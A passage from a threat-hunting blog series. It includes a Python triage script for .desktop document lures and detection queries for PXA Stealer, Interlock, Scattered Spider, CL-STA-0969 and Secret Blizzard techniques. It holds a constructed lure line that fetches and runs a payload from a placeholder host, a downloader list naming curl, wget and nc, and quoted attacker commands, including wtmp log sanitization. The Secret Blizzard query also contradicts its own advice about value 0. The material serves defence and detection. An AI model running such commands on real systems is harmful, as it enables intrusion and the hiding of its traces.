See you tomorrow!
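As an added example for this post (not the original article's query and not APT36's files), here is a static triage of a .desktop file that checks the three things the lure pattern gets wrong: a document extension tucked before .desktop, an entry that dresses itself as a document (Name= ending in .pdf, a PDF icon) while Type=Application, and an Exec= line that downloads and runs something from a hidden or temp path. The two entries below are constructed and the hostname is a placeholder.

```python
"""Triage a Linux .desktop entry for document-lure indicators without executing it."""
import configparser
import os
import re
import shlex

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt")
DOWNLOADERS = {"curl", "wget", "python", "python3", "perl", "base64", "nc"}
SHELLS = {"sh", "bash", "dash", "zsh"}
URL = re.compile(r"https?://", re.IGNORECASE)
HIDDEN_PATH = re.compile(r"(^|/)(\.[^/\s]+)|(^/dev/shm/)|(^/tmp/)")


def parse_desktop(text: str) -> dict:
    """Return the [Desktop Entry] keys as a dict; empty if the file isn't a desktop entry."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                  # keep key case: Exec, Name, Icon
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def exec_tokens(exec_line: str) -> list:
    """Split Exec= into words, recursing into `sh -c "..."` so the inner command is inspected too."""
    try:
        tokens = shlex.split(exec_line)
    except ValueError:
        return exec_line.split()
    out = []
    for i, tok in enumerate(tokens):
        out.append(tok)
        if os.path.basename(tok) in SHELLS and i + 2 < len(tokens) and tokens[i + 1] == "-c":
            out.extend(exec_tokens(tokens[i + 2]))
    return out


def assess(filename: str, text: str) -> list:
    """Return the indicator names that fire for this file (empty list = nothing suspicious)."""
    entry = parse_desktop(text)
    if not entry:
        return []
    indicators = []

    stem, ext = os.path.splitext(filename)
    if ext == ".desktop" and stem.lower().endswith(DOC_EXTS):
        indicators.append("double-extension filename")

    is_app = entry.get("Type", "").strip() == "Application"
    if is_app and entry.get("Name", "").lower().endswith(DOC_EXTS):
        indicators.append("application named like a document")
    if is_app and "pdf" in entry.get("Icon", "").lower():
        indicators.append("application using a PDF icon")

    tokens = exec_tokens(entry.get("Exec", ""))
    names = {os.path.basename(t) for t in tokens}
    if names & DOWNLOADERS and any(URL.search(t) for t in tokens):
        indicators.append("Exec downloads from a URL")
    if any(HIDDEN_PATH.search(t) for t in tokens if t.startswith("/")):
        indicators.append("Exec touches hidden or temp path")
    return indicators


# Constructed lure modelled on the pattern described in the report.
LURE_NAME = "Document Details.pdf.desktop"
LURE = """\
[Desktop Entry]
Version=1.0
Type=Application
Name=Document Details.pdf
Icon=application-pdf
Exec=bash -c "curl -sk https://cdn.example.invalid/d/stage -o /tmp/.cache-x && chmod +x /tmp/.cache-x && /tmp/.cache-x"
Terminal=false
"""

# Constructed benign entry for comparison.
BENIGN_NAME = "org.gnome.gedit.desktop"
BENIGN = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
Categories=GNOME;GTK;Utility;TextEditor;
"""

if __name__ == "__main__":
    for name, text in ((LURE_NAME, LURE), (BENIGN_NAME, BENIGN)):
        print(name, "->", assess(name, text) or ["clean"])
```

Point it at ~/Downloads, ~/.local/share/applications and ~/.config/autostart on the workstations you care about; any single indicator is worth a look, and the download-plus-hidden-path pair alone is a strong signal regardless of how the file is named.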

217. Detecting PXA Stealer's Behavior Markers

Hello everyone! Let's talk about stealers again. This time about PXA stealer. It's a Python-based stealer that emerged in late 2024. Let's look at a few behavior markers covered in a joint report by SentinelOne and Beazley Security. The first one: misusing certutil.exe to decode a masqueraded file into a new encrypted archive:

certutil -decode Document.pdf Invoice.pdf

It's not common for this utility to decode PDF files, so we can use it to build our logic:

event_type: "processcreatewin" AND proc_file_path: "certutil.exe" AND cmdline: ("decode" AND *pdf)

The next behavior: abusing a renamed WinRAR executable to unpack the archive:

images.png x -ibck -y -poX3ff7b6Bfi76keXy3xmSWnX0uqsFYur Invoice.pdf C:\\Users\\Public

Of course, here we can hunt for renamed executables:

event_type: "processcreatewin" AND proc_file_originalfilename: "WinRAR.exe" AND NOT proc_file_path: *winrar*

Make sure to check the report - you can fin...

216. An Interesting Case of Rundll32 Abuse

Hello everyone! Do you remember I mentioned that rundll32.exe is my favourite threat hunting target? Let's look at another example! We'll look inside the report by eSentire on Interlock. The adversary abused rundll32.exe and the Windows Shell Common DLL (shell32.dll) to run a malicious LNK file:

rundll32 shell32.dll,ShellExec_RunDLL "<8_CHARS>.lnk"

So, based on this, we can form a simple hypothesis: an adversary may use rundll32.exe and the Windows Shell Common DLL to run a malicious LNK file:

event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: ("shell32.dll" AND *lnk)

There's another interesting rundll32.exe abuse example in the report. Can you find it? See you tomorrow!

215. Another RMM in Scattered Spider's Arsenal

Hello everyone! Scattered Spider keeps being very active, so it's important to track changes in their tactics, techniques and procedures. The threat actors often use RMMs which are not used by other adversaries very often. For example, Pulseway. The group leverages this tool to obtain redundant access to a compromised network. To detect it, we can, for example, search for executables with "pulseway" in their metadata:

event_type: "processcreatewin" AND proc_file_productname: "pulseway"

Also we can search for DNS queries related to its website:

event_type: "dnsreqwin" AND dns_rname: "pulseway.com"

See you tomorrow!

214. That's How Adversaries Sanitize Logs

Hello everyone! Adversaries often delete logs. But in some cases we can see a more sophisticated approach. For example, they can sanitize the logs, removing only their own traces so the file still looks intact. Let's look at the report on CL-STA-0969. They used utmpdump to dump the contents of the binary wtmp log file into text:

utmpdump /var/log/wtmp >/var/log/wtmp.file

Then they used sed to remove the lines containing their IP address:

sed -i '/<IP Address>/d' /var/log/wtmp.file

And finally utmpdump again, this time with -r to convert the edited text back into the binary format and overwrite the original:

utmpdump -r /var/log/wtmp.file > /var/log/wtmp

So, for example, we can search for suspicious utmpdump executions:

event_type: "processcreatenix" AND proc_file_path: "utmpdump" AND cmdline: "wtmp"

See you tomorrow!

213. That's How Secret Blizzard Reduces the Difficulty of Lateral Movement

Hello everyone! Lateral movement: another common tactic we see daily. Of course, in some cases the threat actors can start it almost immediately after gaining initial access, while in others they need at least some preparation. For example, Secret Blizzard. The adversary modified the registry to reduce the difficulty of lateral movement on the network. The following registry key holds one subkey per network the host has connected to:

SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles

According to the report, the threat actors modify the value Category by setting it to 0 so that the profile of the network is set to Private after the host has been rebooted. One caveat when you build the hunt: in Windows' own definition of this value, 0 means Public, 1 means Private and 2 means Domain (the profile decides which Windows Firewall rule set applies, which is why it matters for lateral movement), so rather than pinning the query to one data value, it's safer to alert on any modification of Category under Profiles made by reg.exe, PowerShell or another process that isn't Windows itself. Of course, we can hunt for such modifications:

event_type: "registryvaluesetwin" AND reg_key_path: "NetworkList\\Profiles" AND reg_value_data: "0x00000000"

See you tomorrow!